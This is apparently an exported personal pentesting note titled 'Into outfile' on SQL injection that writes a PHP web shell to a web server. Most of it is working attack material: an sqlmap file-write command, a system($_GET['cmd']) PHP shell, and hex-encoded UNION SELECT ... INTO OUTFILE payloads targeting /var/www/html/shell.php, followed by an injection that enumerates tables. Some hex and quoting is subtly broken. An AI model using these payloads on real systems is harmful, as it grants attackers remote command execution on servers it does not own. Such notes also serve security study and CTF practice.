<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Into outfile</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Into outfile</h1>

      <div class="ck-content">
        <p><a href="https://websec.wordpress.com/2007/11/17/mysql-into-outfile/">https://websec.wordpress.com/2007/11/17/mysql-into-outfile/</a> </p><pre><code class="language-text-plain">sqlmap -r /tmp/req.sql --file-dest="/var/www/html/shell.php" --file-write="/root/shells/shell.php"</code></pre>

        <p>So to exploit this, we encoded a simple PHP payload to HEX:</p>
        <p><code>&lt;?php system($_GET["cmd"]); ?&gt;</code>

        </p>
        <p>And added it to our exploit:</p><pre><code class="language-text-plain">" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -</code></pre><pre><code class="language-text-plain">'INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY 0x3C3F706870206563686F20223C7072653E22202E207368656C6C5F6578656328245F4745545B22636D64225D29202E20223C2F7072653E223B3F3E-- -</code></pre>

        <p><code>Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d INTO OUTFILE '/var/www/html/shell.php'</code>  <code>&lt;?php system("ls"); ?&gt;</code>

        </p>
        <p><code>' AND "1" = “2” UNION SELECT title FROM challenges WHERE type ="table" AND name NOT LIKE 'sqlite_%</code>

        </p>
      </div>
    </div>
  </body>

</html>